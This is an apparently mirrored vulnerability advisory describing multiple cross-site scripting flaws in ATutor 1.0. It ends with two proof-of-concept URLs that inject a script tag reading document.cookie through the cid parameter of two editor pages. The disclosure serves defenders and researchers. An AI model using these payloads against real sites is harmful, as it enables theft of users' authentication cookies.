header-logo
Suggest Exploit
vendor:
ATutor
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: ATutor
Affected Version From: 1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in ATutor

An attacker can execute arbitrary HTML and script code in the browser of a user, allowing them to steal authentication credentials and launch other attacks.

Mitigation:

Apply the latest patches and updates from the vendor. Avoid clicking on suspicious links or visiting untrusted websites.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43241/info

ATutor is prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ATutor 1.0 is vulnerable, other versions may also be affected. 

http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>

http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>